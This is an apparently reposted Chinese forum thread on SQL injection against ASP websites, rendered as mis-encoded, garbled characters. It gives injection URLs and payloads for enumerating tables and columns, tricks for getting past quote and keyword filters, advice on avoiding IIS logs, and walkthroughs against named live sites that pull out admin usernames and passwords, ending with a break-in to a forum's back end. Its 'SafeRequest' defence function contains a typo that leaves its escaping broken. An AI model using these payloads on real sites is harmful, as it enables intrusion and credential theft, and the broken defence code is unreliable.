Ç°ÃæËµ¹ý£¬sysobjectsÊÇSQLServerµÄϵͳ±í£¬´æ´¢×ÅËùÓеıíÃû¡¢ÊÓͼ¡¢Ô¼Êø¼°ÆäËü¶ÔÏó£¬xtype=¡¯U¡¯ and status>0£¬±íʾÓû§½¨Á¢µÄ±íÃû£¬ÉÏÃæµÄÓï¾ä½«µÚÒ»¸ö±íÃûÈ¡³ö£¬Óë0±È½Ï´óС£¬Èñ¨´íÐÅÏ¢°Ñ±íÃû±©Â¶³öÀ´¡£µÚ¶þ¡¢µÚÈý¸ö±íÃûÔõô»ñÈ¡£¿»¹ÊÇÁô¸øÎÒÃÇ´ÏÃ÷µÄ¶ÁÕß˼¿¼°É¡£

¢Þ http://Site/url.asp?id=1 and (Select Top 1 col_name(object_id(¡®±íÃû¡¯),1) from sysobjects)>0

´Ó¢ÝÄõ½±íÃûºó£¬ÓÃobject_id(¡®±íÃû¡¯)»ñÈ¡±íÃû¶ÔÓ¦µÄÄÚ²¿ID£¬col_name(±íÃûID,1)´ú±í¸Ã±íµÄµÚ1¸ö×Ö¶ÎÃû£¬½«1»»³É2,3,4...¾Í¿ÉÒÔÖð¸ö»ñÈ¡Ëù²Â½â±íÀïÃæµÄ×Ö¶ÎÃû¡£



¡¡¡¡ÒÔÉÏ6µãÊÇÎÒÑо¿SQLServer×¢Èë°ëÄê¶àÒÔÀ´µÄÐÄѪ½á¾§£¬¿ÉÒÔ¿´³ö£¬¶ÔSQLServerµÄÁ˽â³Ì¶È£¬Ö±½ÓÓ°Ïì×ųɹ¦Âʼ°²Â½âËÙ¶È¡£ÔÚÎÒÑо¿SQLServer×¢ÈëÖ®ºó£¬ÎÒÔÚ¿ª·¢·½ÃæµÄˮƽҲµÃµ½ºÜ´óµÄÌá¸ß£¬ºÇºÇ£¬Ò²Ðí°²È«Ó뿪·¢±¾À´¾ÍÊÇÏศÏà³ÉµÄ°É¡£



µÚ¶þ½Ú¡¢Èƹý³ÌÐòÏÞÖÆ¼ÌÐø×¢Èë

ÔÚÈëÃÅÆªÌáµ½£¬ÓкܶàÈËϲ»¶Ó᯺ŲâÊÔ×¢Èë©¶´£¬ËùÒÔÒ²ÓкܶàÈËÓùýÂË¡¯ºÅµÄ·½·¨À´¡°·ÀÖ¹¡±×¢Èë©¶´£¬ÕâÒ²ÐíÄܵ²×¡Ò»Ð©ÈëÃÅÕߵĹ¥»÷£¬µ«¶Ô£Ó£Ñ£Ì×¢Èë±È½ÏÊìϤµÄÈË£¬»¹ÊÇ¿ÉÒÔÀûÓÃÏà¹ØµÄº¯Êý£¬´ïµ½Èƹý³ÌÐòÏÞÖÆµÄÄ¿µÄ¡£

ÔÚ¡°£Ó£Ñ£Ì×¢ÈëµÄÒ»°ã²½Ö衱һ½ÚÖУ¬ÎÒËùÓõÄÓï¾ä£¬¶¼ÊǾ­¹ýÎÒÓÅ»¯£¬ÈÃÆä²»°üº¬Óе¥ÒýºÅµÄ£»ÔÚ¡°ÀûÓÃϵͳ±í×¢ÈëSQLServerÊý¾Ý¿â¡±ÖУ¬ÓÐЩÓï¾ä°üº¬ÓС¯ºÅ£¬ÎÒÃǾٸöÀý×ÓÀ´¿´¿´Ôõô¸ÄÔìÕâЩÓï¾ä£º

¼òµ¥µÄÈçwhere xtype=¡¯U¡¯£¬×Ö·ûU¶ÔÓ¦µÄASCIIÂëÊÇ85£¬ËùÒÔ¿ÉÒÔÓÃwhere xtype=char(85)´úÌæ£»Èç¹û×Ö·ûÊÇÖÐÎĵ쬱ÈÈçwhere name=¡¯Óû§¡¯£¬¿ÉÒÔÓÃwhere name=nchar(29992)+nchar(25143)´úÌæ¡£



µÚÈý½Ú¡¢¾­ÑéС½á

1.ÓÐЩÈË»á¹ýÂËSelect¡¢Update¡¢DeleteÕâЩ¹Ø¼ü×Ö£¬µ«Æ«Æ«Íü¼ÇÇø·Ö´óСд£¬ËùÒÔ´ó¼Ò¿ÉÒÔÓÃselecTÕâÑù³¢ÊÔһϡ£

2.Ôڲ²»µ½×Ö¶ÎÃûʱ£¬²»·Á¿´¿´ÍøÕ¾ÉϵĵǼ±íµ¥£¬Ò»°ãΪÁË·½±ãÆð¼û£¬×Ö¶ÎÃû¶¼Óë±íµ¥µÄÊäÈë¿òÈ¡ÏàͬµÄÃû×Ö¡£

3.ÌØ±ð×¢Ò⣺µØÖ·À¸µÄ+ºÅ´«Èë³ÌÐòºó½âÊÍΪ¿Õ¸ñ£¬%2B½âÊÍΪ+ºÅ£¬%25½âÊÍΪ%ºÅ£¬¾ßÌå¿ÉÒԲο¼URLEncodeµÄÏà¹Ø½éÉÜ¡£

4.ÓÃGet·½·¨×¢Èëʱ£¬IIS»á¼Ç¼ÄãËùÓеÄÌá½»×Ö·û´®£¬¶ÔPost·½·¨×öÔò²»¼Ç¼£¬ËùÒÔÄÜÓÃPostµÄÍøÖ·¾¡Á¿²»ÓÃGet¡£

5. ²Â½âAccessʱֻÄÜÓÃAsciiÖð×Ö½âÂë·¨£¬SQLServerÒ²¿ÉÒÔÓÃÕâÖÖ·½·¨£¬Ö»ÐèÒªÁ½ÕßÖ®¼äµÄÇø±ð¼´¿É£¬µ«ÊÇÈç¹ûÄÜÓÃSQLServerµÄ±¨´íÐÅÏ¢°ÑÖµ±©Â¶³öÀ´£¬ÄÇЧÂʺÍ׼ȷÂÊ»áÓм«´óµÄÌá¸ß¡£







·À ·¶ ·½ ·¨

£Ó£Ñ£Ì×¢Èë©¶´¿ÉνÊÇ¡°Ç§ÀïÖ®µÌ£¬À£ÓÚÒÏѨ¡±£¬ÕâÖÖ©¶´ÔÚÍøÉϼ«ÎªÆÕ±é£¬Í¨³£ÊÇÓÉÓÚ³ÌÐòÔ±¶Ô×¢Èë²»Á˽⣬»òÕß³ÌÐò¹ýÂ˲»Ñϸñ£¬»òÕßij¸ö²ÎÊýÍü¼Ç¼ì²éµ¼Ö¡£ÔÚÕâÀÎÒ¸ø´ó¼ÒÒ»¸öº¯Êý£¬´úÌæASPÖеÄRequestº¯Êý£¬¿ÉÒÔ¶ÔÒ»ÇеÄSQL×¢ÈëSay NO£¬º¯ÊýÈçÏ£º


Function SafeRequest(ParaName,ParaType)
      '--- ´«Èë²ÎÊý ---
      'ParaName:²ÎÊýÃû³Æ-×Ö·ûÐÍ
      'ParaType:²ÎÊýÀàÐÍ-Êý×ÖÐÍ(1±íʾÒÔÉϲÎÊýÊÇÊý×Ö£¬0±íʾÒÔÉϲÎÊýΪ×Ö·û)

      Dim ParaValue
      ParaValue=Request(ParaName)
      If ParaType=1 then
             If not isNumeric(ParaValue) then
                    Response.write "²ÎÊý" & ParaName & "±ØÐëΪÊý×ÖÐÍ£¡"
                    Response.end
             End if
      Else
             araValue=replace(ParaValue,"'","''")
      End if
      SafeRequest=ParaValue
End function

ÎÄÕµ½ÕâÀï¾Í½áÊøÁË£¬²»¹ÜÄãÊǰ²È«ÈËÔ±¡¢¼¼Êõ°®ºÃÕß»¹ÊdzÌÐòÔ±£¬ÎÒ¶¼Ï£Íû±¾ÎÄÄܶÔÄãÓÐËù°ïÖú¡£

TOP

Re: SQL×¢ÈëÌìÊé - ASP×¢Èë©¶´È«½Ó´¥ [תÌû]

SQL×¢ÈëºÚ¿Í·ÀÏßÍøÕ¾ÊµÀý·ÖÎö

NBÁªÃË-СÖñ(QQ:48814)

¡¡¡¡½ñÌìµ½ºÚ·ÀÕ¾ÉÏÈ¥¿´¿´ÎÄÕ£¬¿ÉÄܳöÓÚ¡°Ö°Òµ¡±Ï°¹ß£¬¿´µ½?classid=1Ö®ÀàµÄ¶«¶«¾Í²»ÓÉ×ÔÖ÷µÄÏë¼Óµãʲô²ÎÊý½øÈ¥¡£
   µ±ÔÚÒ³Ãæhttp://www.hacker.com.cn/article ... classid=13¼ÓÉÏ¢Ùand 1=1ºÍ¢Úand 1=2£¬¶¼Ìáʾ¡°´¦Àí URL ʱ·þÎñÆ÷Éϳö´í¡£ÇëºÍϵͳ¹ÜÀíÔ±ÁªÂ硱£¬¿´ÆðÀ´ÏóÒѾ­¹ýÂËÁË·Ç·¨Ìá½»£¬IISÒ²¹Ø±ÕÁË´íÎóÌáʾ£¬ÔÙ¼ÓÉÏÒ»¸ö¢Ûµ¥ÒýºÅ¡¯µÄʱºò£¬Ò²³öͬÑùµÄ´íÎóÌáʾ£¬È»¶øÃ÷ÏÔÓëǰÁ½¸ö´íÎóÌáʾ²»Í¬£¬ÒòΪǰÕßÏÔʾÁ˺ڿͷÀÏßµÄLogo²ÅÌáʾ´íÎ󣬺óÕßÔòÊÇÒ»¸ö¿Õ°×µÄ´íÎóÌáʾҳ¡£
   Õâ¿ÉÊÇÎÒ´ÓÀ´Ã»Åöµ½¹ýµÄÌØÊâÇé¿ö£¬µ½µ×Äܲ»ÄÜ×¢ÈëÄØ£¿
   »»¸ö½Ç¶È£¬´Ó³ÌÐòÔ±µÄ˼·ÊÇÔõôдÕâ¶Î³ÌÐòµÄ¡£Ê×ÏÈ£¬Èç¹ûÊÇÓÃcintÖ®ÀຯÊý£¬ÄÇÈýÖÖ²âÊÔ·½·¨´íÎóÌáʾӦ¸ÃÊÇÍêȫһÑùµÄ£»Èç¹ûû¹ýÂ˵ϰ£¬¢Ù¢ÚµÄ½á¹ûÓ¦¸ÃÊDz»Ò»ÑùµÄ¡£ÅųýÁ˼¸ÖÖÇé¿ö£¬×îºó¾õµÃ¼«¿ÉÄÜÊDz¿·ÖÓï¾ä¹ýÂË£¬³öÏÖÕâÖÖÇé¿öºÜ¿ÉÄÜÊÇcintÓï¾ä²»Ð¡Ðķŵ½SQLÓï¾äµÄºóÃæ£¬ÔÚSQLÓï¾äͨ¹ýºó£¬ºóÃæµÄÓï¾ä±¨´í¡£
   ËäÈ»»¹²»ºÜÈ·¶¨Êµ¼ÊµÄ³ÌÐòÊÇÔõôдµÄ£¬µ«¿ÉÒÔÈ·¶¨£¬ÕâȷʵÊÇÒ»¸ö×¢Èëµã£¡
   ¸ù¾ÝÎÒдµÄ¡¶SQL×¢Èë©¶´È«½Ó´¥¡·£¬ÏÂÒ»²½¾ÍÊÇÅжÏÊý¾Ý¿âÀàÐÍ£¬ÒòΪ´íÎóÌáʾ¶¼±»ÆÁ±Î£¬Ö»ÄÜͨ¹ýϵͳ±í²âÊÔÁË£¬ÊäÈ룺
   http://www.hacker.com.cn/article/index.asp?classid=1 and (Select count(1) from sysobjects)>=0
   Ìáʾ³ö´í£¬Ã»³öÏÖLogo£¬ËµÃ÷ÊÇÓï¾ä±¾ÉíÓÐ´í£¬¼«¿ÉÄÜÊDZísysobjects²»´æÔÚ£¬Ò²¾ÍÊÇ˵Êý¾Ý¿âÊÇAccess£¬ÔÙÄÃÒ»¸öAccessÓ¦ÓеÄϵͳ±íÊÔÊÔ£¨msysobjectsÔÚÕâ¸öʱºòÅɲ»ÉÏÓ󡣬ÒòΪÔÚWebÏÂûÓÐȨÏÞ¶ÁÈ¡£¬SQLÓï¾äͬÑù²»ÄÜͨ¹ý£¬ËùÒÔ£¬±ØÐë»»¸öÓÐȨÏ޵ıíÈçMSysAccessObjects£©£¬¹ûÈ»£¬³öÏÖÁ˺ڷÀµÄLogo£¬Ö¤ÊµÊý¾Ý¿âȷʵÊÇAccess¡£
   ½ÓÏÂÀ´µÄ²Â½â¾Í±È½Ï¼òµ¥ÁË£¬ÓÃ(count(1) from admin)>=0²âÊÔ³öadmin±í´æÔÚ£¬±íÖÐÓÐusername¡¢password×ֶΡ£±¾À´ÒÔΪÏÂÃæ¾ÍÊÇÓÃ×îÆÕͨµÄAscii½âÂë·¨²Â½â¼Ç¼£¬Ð¡Case£¬Ã»Ïëµ½£¬Ò»¿ªÊ¼²Â½â£¬²Å·¢ÏÖÕâÊÇ×îÄѿеÄÒ»¿é¹ÇÍ·£º´«Í³µÄAscii¶Ô±ÈÖУ¬ÎÞÂÛÌõ¼þÊÇ·ñ³ÉÁ¢£¬Óï¾ä¶¼ÊÇ¿ÉÒÔÕýÈ·Ö´Ðеģ¬ËüÊÇÀûÓÃASPµÄ³ö´í¶ø·ÇSQLÓï¾äµÄ³ö´íÀ´·¢ÏÖ´íÎóµÄ£¬ÔÚÕâ¸öÒ³Ãæ£¬²»¹ÜÄã³É²»³ÉÁ¢£¬¶¼ÊÇÏÔʾһ¸öLogoÈ»ºó±¨´í£¬¸ù¾ÝÎÞ·¨×ö³öÅжϡ£
   Ú¤Ë¼¿àÏëÁ˰ë¸öÖÓÍ·£¬ÖÕÓÚÏë³öÒ»ÖÖ·½·¨£¬ÈÃSQLÓï¾äÓÐÌõ¼þµÄ±¨´í£¬ÏÈ¿´¿´Óï¾ä£º
http://www.hacker.com.cn/article/index.asp?classid=1 and
(select top 1 iif(asc(mid(username,1,1))>96,1,username) from admin)>0
   Ð´³öÕâ¸öÓï¾äµÄʱºò£¬Á¬ÎÒ×Ô¼º¶¼ºÃ³ç°ÝÎÒ×Ô¼º£¬¹þ¹þ£¬±ðÍ£¬½âÊÍһϣ¬asc(mid(username,1,1))Õâ¸ö¶¼¿´µÃ¶®£¬È¡usernameµÚһλµÄASCIIÂ룬´óÓÚ96µÄ»°£¬select³öÊý×Ö1£¬Ð¡ÓÚµÈÓÚ96µÄ»°£¬selectÊä³ö×Ö·û´®username£¬È»ºó£¬ÄÃselect³öµÄÖµÓë0±È½Ï¡£
1Óë0¶¼ÊÇÊý×ÖÐÍ£¬µ±ASCIIÂë´óÓÚ96µÄʱºò£¬SQLÓï¾ä²»»á³ö´í£»usernameÔòÊÇ×Ö·ûÐÍ£¬µ±ASCIIÂëСÓÚµÈÓÚ96µÄʱºò£¬SQLÓï¾ä»á³ö´í¡£ËùÒÔ£¬Á½ÖÖÇé¿öµÄ³ö´íÌáʾÊDz»Í¬µÄ£¬ÎÒÃÇ¿ÉÒÔ¸ù¾Ý³ö´íÌáʾÅжÏÓï¾äÊÇ·ñ³ÉÁ¢£¬´Ó¶øÖð²½ËõСÿһλ×Ö·ûµÄ·¶Î§£¬µÃ³öusernameµÄÖµ¡£
ÓÚÊÇ£¬¸ù¾ÝÉÏÃæËù˵µÄ·½·¨£¬µÃ³öusernameµÄֵΪ£ºchr(98)+ chr(114)+ chr(105)+ chr(103)+ chr(104)+ chr(116)=bright£¬passwordµÄֵΪchr(109)+ chr(105)+ chr(110)+ chr(103)+ chr(116)+ chr(105) + chr(97)+ chr(110)=mingtian£¬½âÂëÍê³É¡£

TOP

Re: SQL×¢ÈëÌìÊé - ASP×¢Èë©¶´È«½Ó´¥ [תÌû]

Â¥Ö÷Ç¿ÈË£¡£¡£¡

TOP

Re: SQL×¢ÈëÌìÊé - ASP×¢Èë©¶´È«½Ó´¥ [תÌû]

ÓÐÂÛ̳¿ª·¢ÈËÔ±ÈÏΪֻҪ¼ì²éÓï¾äÖÐÊDz»Êǰüº¬µ¥ÒýºÅ£¬Èç¹û·¢ÏÖµ¥ÒýºÅ¾Í°ÑËûÌæ»»³ÉΪ˫ÒýºÅ¾Í¿ÉÒÔÍêÈ«¶Å¾øSQL×¢Èë¹¥»÷ÁË¡£ÆäʵÎÒÃÇÍêÈ«¿ÉÒÔÈĹýËûµÄÕâ¸öÏÞÖÆ¼ÌÐø½øÐÐ×Ó²éѯÀ´µÃµ½ÃÜÂë¡£
È磺Ìá½»
http://darkeyes.01www.net/bbs/pm ... =3xxxx%20and%20';ºÚÑÛ¾¦'=(select%20username%20from%20user%20where%20username='ºÚÑÛ¾¦')
·µ»Ø£º
Microsoft OLE DB Provider for ODBC Drivers ´íÎó '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Óï·¨´íÎó (²Ù×÷·û¶ªÊ§) ÔÚ²éѯ±í´ïʽ 'q_id=4 and ''ºÚÑÛ¾¦''=(select username from user where username=''ºÚÑÛ¾¦'')' ÖС£

/20ntbbs/pm.asp£¬ÐÐ0


ÎÒÃÇ¿ÉÒÔ°Ñ´úÂ뻻Ϊ£º
http://darkeyes.01www.net/bbs/pm ... x%20and%20exists%20(select%20u_id%20from%20user%20where%20u_id=1%20and%20asc(mid(username,1,1))=-16181)


½âÊÍÒ»ÏÂÓï¾äµÄÒâ˼£¬asc(mid(username,1,1))=xxÖÐʹÓÃÁ˶þ¸öSQLº¯Êý£¬ÆäÖÐASC()ÊǰÑÀ¨ºÅÖеÄÄÚÈÝת»¯³ÉΪASCÂ룬mid(username,1,1)µÄÓÚÊǾÍÊǰÑÒ»¸öÄÚÈݷֳɼ¸²¿·ÖÈ¡³ö£¬¸ñʽΪmid(ÁÐÃû£¬Æðʼλ£¬È¡³ö×Ö·ûµÄ³¤¶È)£¬ÉÏÃæ¾ä×ÓÖеÄÒâ˼¾ÍÊÇÈ¡³öusernameÁÐÖеÚһλASCÂëΪ-16181£¬-16181¾ÍÊǺÚÑÛ¾¦µÄÖÐÎÄIDÖеĺڵÄASCÂëÖµ¡£µÝ½»ÉÏÃæµÄURL¾Í²»°üº¬µ¥ÒýºÅÁË£¬ÎÒÃÇÈÔÈ»¿ÉÒÔ´ïµ½²éѯµÄÄ¿µÄ¡£Èç¹û²Â¶ÔÁ˾ͻáÕý³£·µ»ØÒ³Ã棬µÝ½»ÉÏÃæµÄÓï¾ä·µ»ØÁËÕý³£µÄÒ³ÃæËµÃ÷ÔÚuser±íÖкÚÑÛ¾¦µÄidΪ1£¬ÔÙ¼ÌÐø²ÂÃÜÂ룺

TOP

»Ø¸´:Re: SQL×¢ÈëÌìÊé - ASP×¢Èë©¶´È«½Ó´¥ [תÌû]

ÒýÓÃ:
ÏÂÃæÒýÓÃÓÉСêØÔÚ 2004/04/24 00:41 ·¢±íµÄÄÚÈÝ£º
Â¥Ö÷Ç¿ÈË£¡£¡£¡

ÔΣ¬ÎÒÊÇתµÄ£¬NBµÄÇ¿È˰¡

TOP

ºì¶¹ÎÄÕª·¢²¼ÏµÍ³1.1 µÄ³É¹¦×¢Èë

  cand

ÊÂÒò:ÅóÓÑÔÚijÂÛ̳·¢µÄÌù×Ó,¸Ð¾õÄÚÈݲ»Í×,ÏëÐ޸ĻòÕßɾ³ý.¸ÃÂÛ̳ÊǹÜÀíÔ±×Ô¼º¿ª·¢µÄ,ûÓÐÌṩÐ޸Ļòɾ³ý¹¦ÄÜ,ÌØÏòÎÒÇóÖú.

   1µ½¸ÃÂÛ̳µ½´¦¿´¿´,ÔÚID=XXXµÄµØ·½ÊäÈë'/and 1=1 /and 1=2¶¼ÓгÌÐòÔ¤¶¨µÄ´íÎóÌáʾ.¿´À´ÊǹýÂËÁË,ÔÚ¸ÃÂÛ̳ÆäËûµØ·½,ҲûÓÐÕÒµ½Í»ÆÆ¿Ú.¸Ð¾õû·¨ÏÂÊÖ.

   2µ½¸ÃÍûÕ¾ÆäËû¸÷À¸Ä¿¿´¿´,¿´ÓÐÎÞ×¢Èë©¶´,ÖÕÓÚµ½Ò»´Î´ÎµÄʧ°ÜÖ®ºó£¬ÊäÈë'ºó£¬ÓÐÒ»´¦Ìáʾ:Microsoft JET Database Engine ´íÎó '80040e14'

   ×Ö·û´®µÄÓï·¨´íÎó ÔÚ²éѯ±í´ïʽ 'articleID=306'' ÖС£
   ÓÉ´ËÅжÏÊý¾Ý¿âÊÇACCESS
   È»ºóÔÙÊäÈë and 1=1 ÏÔʾÕý³£! and 1=2,ÏÔʾÕÒ²»µ½¸ÃÎÄÕÂ.....

   ´ó¼Ò¶¼Ã÷°×¸ÃÔõô×öÁ衃 ? Èç¹û¿ÉÄÜ£¬Ö±½ÓÏÂÔØÊý¾Ý¿â,ÕâÑù¾Í²»ÓÃÈ¥²Â¹ÜÀíÔ±ÕʺÅÁË,½á¹ûÊý¾Ý¿â¸ÄÃûΪASP²¢¼ÓÈëÁ˶þ½øÖƵÄ%>,ϲ»ÁË. ¿´À´µÃÒ»²½²½À´....

   ÅжϹÜÀíÔ±±íÃû===> ADMIN
   ÅжÏADMINÀïµÄ×Ö¶Î===> USERNAME /PASSWORD
   ÅжϵÚÒ»¸öÓû§Ãû/ÃÜÂ볤¶È ,¶¼Îª===> 5
   Ö±½Ó³¢ÊÔÓû§ÃûÃÜÂë/ÃÜÂëADMIN/ADMIN,´íÎó! ¼ÌÐø³¢ÊÔ....
   Ê¹ÓÃand (select top 1 mid(username,1,1) from Admin)>'a' ÎÞÏÔʾ£¬µÃÓû§ÃûµÚÒ»×ÖĸΪa

   and (select top 1 mid(username,2,1) from Admin)>'m'Ö±½ÓʹÓÃ×Öĸ/Êý×Ö½øÐÐÔò°ë²éÕÒ,ûÓÐʹÓÃASC,Ò»°ã4-6´Î¾Í¿ÉÒÔÅжÏ.  µÃd
   Í¬Àí,ʹÓÃand (select top 1 mid(username,3,1) from Admin)>'m'................
   µÃµ½Óû§ÃûΪadmin

   Ê¹ÓÃand (select top 1 mid(password,1,1) from Admin)>'m'......

   µÃÃÜÂë *****
   µÇ½ºǫ́²»ÓÃÕÒ,Ö÷Ò³µ×ϾÍÓÐÁË.......
   µÇ½µ½ºǫ́£¬·¢ÏÖʹÓõÄÊǺ춹ÎÄÕª·¢²¼ÏµÍ³1.1[¿ÉÏÂÔØ¸øÏµÍ³À´Ñо¿]
   BBSÓжÀÁ¢µÄºǫ́¹ÜÀí,¹ÜÀíÕʺÅͬÉÏ!

   ´Ó·¢ÏÖ¿ÉÒÔ×¢Èë,µ½²Â½â³É¹¦,²»µ½5·ÖÖÓ,È«ÊÖ¹¤

TOP

·¢Ð»°Ìâ